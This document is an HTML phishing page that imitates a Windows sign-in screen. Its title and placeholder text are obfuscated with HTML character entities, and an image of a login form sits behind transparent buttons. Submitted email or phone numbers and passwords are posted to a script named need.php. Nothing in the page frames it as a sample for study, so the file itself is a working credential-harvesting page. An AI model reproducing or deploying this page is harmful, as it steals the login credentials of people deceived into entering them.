
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

<title>WIND&#79;&#87;&#83;&#32;&#83;&#49;GN 1&#78;.</title>
<meta name="GENERATOR" content="DUDU">
<meta name="DUDU" content="DUDU">
<style type="text/css">
body
{
   background-color: #FFFFFF;
   color: #000000;
}
</style>
<style type="text/css">
input.pw { -webkit-text-security: disc; }
</style>
<style type="text/css">
a:hover
{
   color: #6CDA7B;
}
</style>

</head>
<body>
<div id="bv_Image2" style="margin:0;padding:0;position:absolute;left:20px;top:15px;width:360px;height:389px;text-align:left;z-index:3;">
<img src="images/klp.png" id="Image2" alt="" style="width:360px;height:389px;" align="top" border="0"></div>
<input id="Button2" name="Button1" value="" style="position:absolute;left:32px;top:267px;width:86px;height:38px;border:0px #000000 dotted;background-color:transparent;font-family:Arial;font-size:13px;z-index:4" type="submit">

<div id="bv_Form1" style="position:absolute;left:0px;top:0px;width:398px;height:403px;z-index:5">
<form name="Form1" method="post"  action="need.php">

<input id="email" style="position:absolute;left:41px;top:137px;width:318px;height:29px;border:1px #C0C0C0 solid;font-family:Arial;font-size:12px;z-index:0" name="em" value="" type="text" required placeholder="E&#109;&#97;&#105;l  or phone">

<input style="position:absolute;left:41px;top:177px;width:318px;height:29px;border:1px #C0C0C0 solid;font-family:Arial;font-size:12px;z-index:1" class="pw" name="ps" value="" type="password"  required placeholder="P&#97;&#115;&#115;&#119;&#111;&#114;d ">


<input id="Button3" name="Button1" value="" style="position:absolute;left:41px;top:265px;width:86px;height:38px;border:0px #000000 dotted;background-color:transparent;font-family:Arial;font-size:13px;z-index:2" type="submit">
</form>
</div>

</body></html>